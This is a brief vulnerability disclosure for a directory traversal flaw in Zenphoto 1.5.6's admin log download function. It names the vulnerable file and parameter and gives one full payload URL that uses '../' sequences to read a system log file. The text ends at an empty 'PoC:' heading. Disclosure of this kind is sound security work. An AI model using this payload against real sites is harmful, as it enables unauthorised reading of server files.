CVE-2020-22144

An issue in /zp-core/admin-logs.php of Zenphoto 1.5.6 allows attackers to perform a directory traversal and read arbitrary log files.

• mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-22144

Description:
The admin function allows to download log files from the local system that are not suppose to.

Details:
File: /zp-core/admin-logs.php
Parameter: filename

Payload:

/zp-core/admin-logs.php?action=download_log&page=logs&tab=setup&filename=../../../../../../../../../var/log/alternatives&XSRFToken=bcf89608fdaaa5e293ccd5f83d1614f05bfcbaae

PoC: